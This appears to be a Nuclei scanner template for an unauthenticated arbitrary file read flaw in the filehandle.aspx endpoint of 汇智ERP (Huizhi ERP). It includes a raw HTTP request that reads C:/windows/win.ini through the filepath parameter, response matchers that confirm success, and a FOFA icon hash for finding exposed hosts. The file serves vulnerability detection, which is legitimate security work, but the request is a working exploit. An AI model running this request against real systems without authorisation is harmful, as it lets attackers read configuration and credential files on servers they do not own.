http:
    - matchers:
        - part: body
          type: word
          words:
            - ; for 16-bit app support
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /nssys/common/filehandle.aspx?filepath=C%3a%2fwindows%2fwin%2eini HTTP/1.1
          Host: {{Hostname}}
id: huizhiERP-filehandle-File-reading
info:
    author: Superhero
    description: |-
        fofa: icon_hash="-642591392"
        汇智ERP filehandle.aspx 接口处任意文件读取漏洞，未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件，造成信息泄露，导致系统处于极不安全的状态。
    name: 汇智ERP filehandle.aspx 任意文件读取漏洞
    reference:
        - https://blog.csdn.net/m0_60571842/article/details/140736341
    severity: high
    tags:
        - File reading
